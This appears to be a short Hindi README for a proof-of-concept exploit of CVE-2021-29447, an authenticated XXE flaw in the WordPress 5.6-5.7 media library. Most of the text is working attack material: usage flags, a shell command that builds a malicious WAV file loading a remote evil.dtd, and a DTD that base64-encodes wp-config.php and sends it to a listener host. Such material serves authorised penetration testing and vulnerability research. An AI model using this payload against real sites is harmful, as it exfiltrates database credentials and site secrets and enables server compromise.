
CVE-2021-29447 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: WordPress 5.6-5.7 मीडिया लाइब्रेरी में प्रमाणित XXE। दुर्भावनापूर्ण WAV फ़ाइल और DTD उत्पन्न करता है ताकि आउट-ऑफ-बैंड डेटा एक्सफिल्ट्रेशन के माध्यम से मनमाने सर्वर फ़ाइलों को पढ़ा जा सके।
CVE-2021-29447 वर्डप्रेस 5.6-5.7 - प्रमाणित (Author+) XXE
https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
उपयोग:
-l LHOST उदाहरण: 127.0.0.1 -n NAME उदाहरण: payload.wav -dn DTD_NAME उदाहरण: evil.dtd -r READ उदाहरण: ../wp-config.php
evil-wav-dtd-xxe.py: error: the following arguments are required: -l/--lhost, -n/--name, -dn/--dtd, -r/--read
स्क्रिप्ट चलाने का उदाहरण:
./evil-wav-dtd-xxe.py -l 127.0.0.1 -n payload.wav -dn evil.dtd -r "../wp-config.php"
[*]Created: evil.dtd
-------------------------------------------------------------------------
-- below commands run in terminal directory: generate the .wav file --
-------------------------------------------------------------------------
echo -en 'RIFF\x85\x00\x00\x00WAVEiXML\x79\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://127.0.0.1/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
evil.dtd(स्वतः जनरेट)
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://127.0.0.1/?p=%file;'>" >